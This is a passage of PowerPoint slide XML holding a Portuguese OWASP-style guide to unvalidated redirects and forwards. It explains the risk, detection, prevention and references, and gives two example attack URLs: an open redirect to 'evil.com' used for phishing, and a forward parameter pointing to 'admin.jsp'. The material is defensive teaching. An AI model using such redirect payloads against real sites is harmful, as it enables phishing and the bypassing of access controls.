                        <a:t>MODERADO</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico do Negócio/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicação</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="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451035">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considere quem possa enganar seus usuários</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> para que enviem uma solicitação  ao seu site. Qualquer site ou feed HTML que seus usuários utilizam poderia fazer isso.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>O atacante aponta para um redirecionamento inválido e engana as vítimas para que cliquem nele. As vítimas são mais propensas a clicar, já que o link aponta para um site válido. O atacante visa um  encaminhamen-to inseguro para evitar verificações de segurança.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicações frequentemente redirecionam usuários para outras páginas</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, ou usam encaminhamentos internos de uma maneira similar. Por vezes a página de destino é especificada através de um parâmetro que não é validado, permitindo que o atacante escolha essa página de destino. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detectar redirecionamentos inválidos é fácil. Procure por aqueles onde você pode definir a URL completa. Encaminhamen-tos inválidos são mais difíceis, pois eles têm como alvo páginas internas.</a:t>
                      </a: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marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Tais redirecionamentos podem tentar instalar malware ou enganar vítimas para que divulguem suas senhas ou outras informações sensíveis</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Encaminhamentos inseguros podem permitir contornar os controles de acesso.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considere o valor de negócio da manutenção da confiança de seus</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>E se eles forem infectados por malware? </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>E se atacantes puderem acessar funções que deveriam ser somente internas?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6705600"/>
            <a:ext cx="3383280" cy="24384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r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemplos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenários </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de Ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenário #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: A aplicação possui uma página chamada “redirect.jsp” que recebe apenas um parâmetro “url”. O atacante cria uma URL maliciousa que redireciona os usuários para o site malicioso, que executa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e instala malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.example.com/redirect.jsp?url=evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenário #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: A aplicação usa encaminhamentos para rotear requisições entre partes diferentes do site. Para facilitar, algumas páginas usam um parâmetro para indicar onde o usuário deve ser enviado se a transação for efetuada com sucesso. Neste caso, o atacante cria uma URL que irá passar pela verificação de controle de acesso e encaminhá-lo para uma funcionalidade administrativa que o atacante não teria autorização para acessá-la.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.example.com/boring.jsp?fwd=admin.jsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3886200"/>
            <a:ext cx="3383280" cy="27432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r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Estou vulnerável?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A melhor forma de verificar se uma aplicação possui redirecionamentos ou encaminhamentos não validados é:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Revise o código de todos os usos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de redirecionamentos ou encaminhamentos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(chamados de transferência em .NET). Para cada uso, identifique se a URL de destino está incluída em quaisquer valores de parâmetro. Caso a URL de destino não seja validada em uma lista branca, você está vulnerável.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Também, varra o site para verificar se ele gera algum redirecionamento (códigos de resposta HTTP 300-307, tipicamente 302). Olhe para os parâmetros fornecidos antes do redirecionamento para verificar se eles parecem ser uma URL de destino ou apenas parte dela. Se sim, altere a URL de destino e observe se o site redireciona para o novo destino.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Se o código não estiver disponível, verifica todos os parâmetros para identificar se eles parecem ser parte de um redirecionamento ou encaminhamento e teste todos.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="6705600"/>
            <a:ext cx="3383280" cy="24384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r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referências</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId4"/>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5"/>
              </a:rPr>
              <a:t>OWASP Article on Open Redirects </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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6"/>
              </a:rPr>
              <a:t>ESAPI SecurityWrapperResponse sendRedirect() method</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId7"/>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8"/>
              </a:rPr>
              <a:t>CWE Entry 601 on Open Redirects </a:t>
            </a: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9"/>
              </a:rPr>
              <a:t>WASC Article on URL Redirector Abuse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Google blog article on the dangers of open redirects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Top 10 for .NET article on Unvalidated Redirects and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Forwards</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="3886200"/>
            <a:ext cx="3383280" cy="27432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r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Como faço para evitar?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uso seguro de redirecionamentos e encaminhamentos pode ser feito de várias formas:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Simplesmente evitar usá-los.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Se forem usados, não envolva parâmetros do usuário no cálculo do destino. Normalmente, isto pode ser feito.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Se os parâmetros de destino não podem ser evitados, tenha certeza que o valor fornecido é </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>válido</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>autorizado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
